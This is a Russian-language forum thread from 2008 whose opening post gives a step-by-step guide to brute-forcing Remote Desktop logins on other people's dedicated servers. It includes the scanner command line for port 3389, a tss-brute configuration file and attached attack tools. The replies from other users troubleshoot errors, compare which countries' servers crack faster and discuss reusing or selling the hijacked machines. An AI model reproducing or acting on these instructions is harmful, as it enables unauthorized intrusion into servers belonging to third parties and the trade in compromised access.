ICQ - форум. Всё про ICQ.  

Вернуться   ICQ - форум. Всё про ICQ. > Underground > Информационная безопасность

Информационная безопасность Всё о безопасности в сети. Любые просьбы о взломах караются по всей строгости закона ;)

 
 
Опции темы Рейтинг: Рейтинг темы: голосов - 9, средняя оценка - 3.11.
Старый 07.08.2008, 00:54   #1
Участник заблокирован
 
Регистрация: 11.12.2007
Сообщений: 935

Репутация: 1508
По умолчанию Брут дедиков [by Capcha]

Расскажу вам как брутить дедики моим старым способом.

ЧТО НУЖНО??
1. Нам нужен VNC_Byauth сканер (В аттаче).
2. Нужен tss-brute (В аттаче).
3. Нужен мой скрипт на PHP для генерации BAT файлов (Смотрим в аттаче).
4. Прога от RankroR'a для выдирания гудов ,которую он делал спец. для меня качаем (В аттаче).
6. RDP 5.1 (В аттаче).
6. Как всегда руки.
7. Мозг тоже пригодится.


Начнём!!

1. Открываем cmd.exe (WIN+R), запускаем VNC_Byauth c параметрами -i xxx.xxx.xxx.xxx-yyy.yyy.yyy.yyy -p 3389 -cT -T Кол-во потоков

2. После того как сканер просканил смотрим его лог в блокноте , удаляем из списка :3389 порт оставив просто список IP адресов.

3. Ставим мой скрипт на хост или на localhost и вставляем туда наши айпишнеги и другие данные.

4. После того как скрипт выполнил своё дело создаём в папке с нашим tss-brute.exe , BAT файл и вставляем в него результат полученый после выполнения скрипта.

5. Заходим в файл smclient.ini который шол вместе с tss-brute.exe и вставляем туда мой конфиг
Код:
[dlls]
tshare=tclient.dll
;check=tclient.dll
;rs232=rs232kbd.dll
[tclient]
;timeout=120
;contimeout=20
StartRun=ShutDown...
StartRunAct=r
RunBox=Typethenameofaprogram
WinLogon=Options<<
;WinLogonAct=\x\&u\&
WinLogonAct=\&u\&
PriorWinLogon=Options>>
PriorWinLogonAct=\&o\&
NTSecurity=ShutDownWindows
NTSecurityAct=\p\p\p\p\p\l
SureLogoff=Logoff
SureLogoffAct=\n
StartLogoff=\p\p\p\p\p\72\*72\n
LogonErrorMessage=LogonMessage
LogonDisabled=Remoteloginsarecurrentlydisabled
LowSpeed=0
PersistentCache=1
;FullScreen=1
;UIClientCaption=Terminal Server Client
;UIDisconnectDialogBox=Terminal Services Client Disconnected
;UIYesNoDisconnect=Disconnect Windows session
ClientImage=mstsc.exe
[clx]
verbose=1
;GlyphEnable=1
и сохраняем.

6. Создаём в той же папке где лежит наш BAT фаил папку которую вы вписывали в скрипте(ОБЯЗАТЕЛЬНО!!!!)

7. После выполнения Брута заходим в нашу папку(см п.6) и вставляем в него программу от Rankor'а. Создаём папку output и вней output.txt

8. Вписываем в программе success , если хоть один дед сбручен программа вам покажет это, если что-то сбрутилось то смотри output.txt там вы увидите IP адресс деда и пароль.

9. Заходим в MSTSC (тобиш RDP) и проверяем наши деды ;)

10. Фсё на этом я закончил если что-то не ясно задаём вопросы тут ))

Для тех у кого не работает брут:
1. Если у вас после запуска бат файла не появляется окно РДП клиента, а запрос на ввод пароля и логина, то скачайте 5версию MSTSC и установите её в безопасном режиме.

2. Если у вас загружается окно РДП клиента, но не происходит подбор паролей, попробуйте отключить брэндмауэр. Иногда брут не может выполнять свои действия если язык на дедике не Англиский.

3. Если не происходит подбор паролей, то поменяйте в панели управления язык по умолчанию на Англиский.

3. Если у вас не работает мой скрипт (если выводит лишние слэши) , это значит что вы не залили .htaccess который идёт вместе с моим скриптом, если так и не получилось запустить, то воспользуйтесь ссылкой которая ниже на полностью работающий сайт с моим скриптом.

Спецально для тех кому не хочется парить мозг с моим скриптом RankoR написал программу для генерирования батников, качаем тут http://forum.asechka.ru/showpost.php...&postcount=270



ТЕМА ОБНОВЛЕНА, ФАЙЛЫ ЗАЛИТЫ В АТТАЧ




VIDEO F.A.Q

Конечно же отдельное спасибо metal'у за его софтину (tss-brute)
(c) Capcha [07.08.2008] Special For Asechka.ru

Копирования статьи только с разрешения автора.
Вложения
Тип файла: rar rankor.rar (186.1 Кб, 2529 просмотров)
Тип файла: rar www.rar (894 байт, 2061 просмотров)
Тип файла: rar VNC_Bypauth.rar (5.8 Кб, 1723 просмотров)
Тип файла: rar tss-brute.rar (86.8 Кб, 2277 просмотров)
Тип файла: rar RDP_client 5.1.rar (397.9 Кб, 2124 просмотров)

Последний раз редактировалось Capcha; 17.05.2009 в 00:57.
Capcha вне форума  
Плюсанули Capcha — 2 :
Старый 29.11.2008, 21:37   #401
Участник
 
Регистрация: 28.08.2008
Сообщений: 244

Репутация: 894
По умолчанию

какой $$$ output ? или у меня со зрением херова..
на скрине output некак
ты что буквы не различаешь , не output , outfile.txt
steamhjkee вне форума  
Старый 29.11.2008, 21:42   #402
Участник
 
Регистрация: 24.06.2008
Сообщений: 530

Репутация: 864
По умолчанию

steamhjkee, дурачок,скачай прогу ранкора и посмари как там че называется.
__________________
купить номер icq
...vamp вне форума  
Старый 29.11.2008, 23:02   #403
Участник
 
Аватар для .Qver.
 
Регистрация: 08.01.2008
Сообщений: 16

Репутация: 4
По умолчанию

steamhjkee, знаешь в чем прикол? в том что много раз писалось, что прогу от РАНКОРА нельзя запускать ОДНОВРЕМЕННО С БРУТОМ, т.е. ты должен выйти из брута и затем уже вводить в поле поиска "success" всё будет ок.
.Qver. вне форума  
Старый 29.11.2008, 23:05   #404
Участник
 
Регистрация: 16.11.2008
Сообщений: 19

Репутация: 5
По умолчанию

омг ...vamp рли дебил??
папка должна называтся outfile а не output, а файл outfile.txt а не output.txt

Цитата:
Сообщение от .Qver. Посмотреть сообщение
steamhjkee, знаешь в чем прикол? в том что много раз писалось, что прогу от РАНКОРА нельзя запускать ОДНОВРЕМЕННО С БРУТОМ, т.е. ты должен выйти из брута и затем уже вводить в поле поиска "success" всё будет ок.
при этом другой эрор вылетает, а именно: I/O error 32

Последний раз редактировалось shocker; 29.11.2008 в 23:09.
shocker вне форума  
Старый 29.11.2008, 23:17   #405
Участник
 
Аватар для stalkersanya
 
Регистрация: 29.06.2008
Сообщений: 170

Репутация: 136
По умолчанию

.Qver., один хер...та же ошибка

Добавлено через 5 минут
всё всем спасиба разобрался....надо было просто переименовать как говорил
steamhjkee,

Добавлено через 46 минут
еще такой вопросиг...почему одни дедики например польские афигенно долго брутяться а другие например норвежские на 5 паролей перебираются быстрее чем поляки на 1??? почему так происходит и какие самые "быстрые " страны

Добавлено через 3 часа 15 минут
Цитата:
Сообщение от Zloyka Посмотреть сообщение
народ как сделать что бы окна не всплывали постоянно ? кино даже при бруте не посмотреть
ваще кул когда в кс гамаешь))))))))

Добавлено через 3 часа 17 минут
и как сделать чтоб брут не останавливался когда пинг оч высокий??? менять конфиг в ини пробовал---нэхэра не помогает

Добавлено через 3 часа 55 минут
короче сбрутил дедик но вот такая проблема при подключении http://s42.radikal.ru/i096/0811/75/702e2704fa1a.jpg

Последний раз редактировалось stalkersanya; 30.11.2008 в 03:13. Причина: Добавлено сообщение
stalkersanya вне форума  
Старый 30.11.2008, 10:44   #406
Участник
 
Регистрация: 28.08.2008
Сообщений: 244

Репутация: 894
По умолчанию

Не пла vamp ты меня тут обосрал , и я еще окозался прав..
так что перед тем как постить , сам поюзай..
steamhjkee вне форума  
Старый 30.11.2008, 10:47   #407
Участник
 
Регистрация: 16.11.2008
Сообщений: 19

Репутация: 5
По умолчанию

Цитата:
Сообщение от stalkersanya Посмотреть сообщение
всё всем спасиба разобрался....надо было просто переименовать как говорил
steamhjkee,
ну ващето я 1 говорил :)
Цитата:
Сообщение от stalkersanya Посмотреть сообщение
еще такой вопросиг...почему одни дедики
например польские афигенно долго брутяться а другие например норвежские на 5 паролей перебираются быстрее чем поляки на 1??? почему так происходит и какие самые "быстрые " страны
такое происходит изза того что на деде в системе стоит не английский язык по умолчанию.
shocker вне форума  
Старый 02.12.2008, 01:55   #408
Участник
 
Аватар для stalkersanya
 
Регистрация: 29.06.2008
Сообщений: 170

Репутация: 136
По умолчанию

да еще вот такой вопрос..на втором деде кто то уже проверял скорость соединения...были ли такие случаи когда два человека один и тот же дедик юзали или продавали или это ниче страшного??

Последний раз редактировалось stalkersanya; 02.12.2008 в 08:55.
stalkersanya вне форума  
Старый 02.12.2008, 02:37   #409
Участник
 
Аватар для tarzan2006
 
Регистрация: 28.08.2008
Сообщений: 35

ICQ: 452462

Репутация: 8
По умолчанию

как сделать что бы окна не всплывали постоянно ? тоже интересует!
__________________
накручу рейтинг на торенте за WMZ
Продам 452-462 писать в него или в ЛС! 40 WMZ
обрашатся 452-462
tarzan2006 вне форума  
Старый 02.12.2008, 07:53   #410
Участник
 
Регистрация: 27.01.2008
Сообщений: 138

Репутация: 312
По умолчанию

какие?подключения к уд. рабочему столу ни как
$Atlet$ вне форума  
Старый 02.12.2008, 15:42   #411
Участник заблокирован
 
Регистрация: 11.12.2007
Сообщений: 935

Репутация: 1508
По умолчанию

Нуу вообще-то всё можно, можно написать програмку на том-же Delphi которая будет следить по Хэндлеру за открывающимися окошками, а затем нажимать на соответствующую кнопку.
Capcha вне форума  
Старый 02.12.2008, 19:55   #412
Участник
 
Регистрация: 27.01.2008
Сообщений: 138

Репутация: 312
По умолчанию

локальные ресурсы отключи все
$Atlet$ вне форума  
Старый 03.12.2008, 22:34   #413
Супер Модератор
Креативщик года
 
Аватар для Genom2Geri
 
Регистрация: 27.04.2008
Сообщений: 386

ICQ: 3784333

По умолчанию

дошол до пункта брута. создал бат файл, запускаю его. выскакивает на многовение консолное окно и проподает. захожу в папку logs, ну тоесть куда логи записывались и там txt файлы имена которых являються IPы. В какой фалй не зайду там написано Error loading tclient.dll. что это может бытЬ?
__________________
#asechkaживи
Genom2Geri вне форума  
Старый 03.12.2008, 22:47   #414
Участник заблокирован
 
Регистрация: 11.12.2007
Сообщений: 935

Репутация: 1508
По умолчанию

Genom2Geri, tclient.dll в папке с буртом есть?
Capcha вне форума  
Старый 03.12.2008, 22:57   #415
Супер Модератор
Креативщик года
 
Аватар для Genom2Geri
 
Регистрация: 27.04.2008
Сообщений: 386

ICQ: 3784333

По умолчанию

Кознить, нельзя помиловать. Нет. а откуда эту библиотеку взять надо?
__________________
#asechkaживи
Genom2Geri вне форума  
Старый 03.12.2008, 23:07   #416
Участник заблокирован
 
Регистрация: 11.12.2007
Сообщений: 935

Репутация: 1508
По умолчанию

Genom2Geri, из архива оО...
Вложения
Тип файла: rar tclient.rar (25.9 Кб, 187 просмотров)
Capcha вне форума  
Старый 05.12.2008, 22:43   #417
Участник
 
Аватар для neofoks
 
Регистрация: 28.03.2008
Сообщений: 42

Репутация: -6
По умолчанию

Ну че пора поделится статистикой!
У кого как я вот 1 сбрутил месяц назад и забил.Седня опять возобновил:)
neofoks вне форума  
Старый 05.12.2008, 22:55   #418
Участник заблокирован
 
Регистрация: 05.12.2008
Сообщений: 13

Репутация: 1
По умолчанию

ставлю на ночь ничего, ненаходит

found 0.

что не так?

помогите придурку

ramb712 вне форума  
Старый 05.12.2008, 23:01   #419
Участник заблокирован
 
Регистрация: 11.12.2007
Сообщений: 935

Репутация: 1508
По умолчанию

ramb712, Возможно:
1.Плохой диап
2..Фаер блочит
Capcha вне форума  
Старый 05.12.2008, 23:58   #420
Участник
 
Аватар для tarzan2006
 
Регистрация: 28.08.2008
Сообщений: 35

ICQ: 452462

Репутация: 8
По умолчанию

порт 3389, а не 3839
__________________
накручу рейтинг на торенте за WMZ
Продам 452-462 писать в него или в ЛС! 40 WMZ
обрашатся 452-462
tarzan2006 вне форума  
Старый 05.12.2008, 23:59   #421
Участник заблокирован
 
Регистрация: 11.12.2007
Сообщений: 935

Репутация: 1508
По умолчанию

tarzan2006, Хаха, реально....

Чел ты реально тупанул))
Capcha вне форума  
Старый 06.12.2008, 09:24   #422
Участник заблокирован
 
Регистрация: 05.12.2008
Сообщений: 13

Репутация: 1
По умолчанию

Цитата:
Сообщение от Capcha Посмотреть сообщение
ramb712, Возможно:
1.Плохой диап
2..Фаер блочит
диап 2 мб

фаер вообще нет
ramb712 вне форума  
Старый 06.12.2008, 10:22   #423
Участник
 
Регистрация: 16.06.2008
Сообщений: 127

Репутация: 278
По умолчанию

Цитата:
диап 2 мб

фаер вообще нет
: )
диап - сокращенно от диапазон, плохой диапазон ip-адресов мжт быть у тебя. фаер - может и брандмауэр винды быть.
На какой то не тот порт ты сканишь, если хочешь дедики брутить по этому "старому способу Capcha".
__________________

иголкин вне форума  
Старый 06.12.2008, 11:50   #424
Участник заблокирован
 
Регистрация: 05.12.2008
Сообщений: 13

Репутация: 1
По умолчанию

а час вообще пишет не правильный порт

ramb712 вне форума  
Старый 06.12.2008, 11:58   #425
Участник
 
Регистрация: 28.08.2008
Сообщений: 244

Репутация: 894
По умолчанию

- i xxx.xxx.xxx.xxx-xxx.xxx.xxx.xxx -p 3389 -cT -T 200
-T20000 раздельно
и -p 3389 раздельно , ты вообще чё та кранишь
неправелный мозг у тебя , по образцу сделать неможешь.. тема на 20 страниц почти..
ты тут сопли развёл

Последний раз редактировалось steamhjkee; 06.12.2008 в 12:10.
steamhjkee вне форума  
 

Метки
brute, dedicated server


Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход


Часовой пояс GMT +3, время: 18:09.


Перевод: zCarot
Форум Асечников © Asechka.RU

Новости Сочи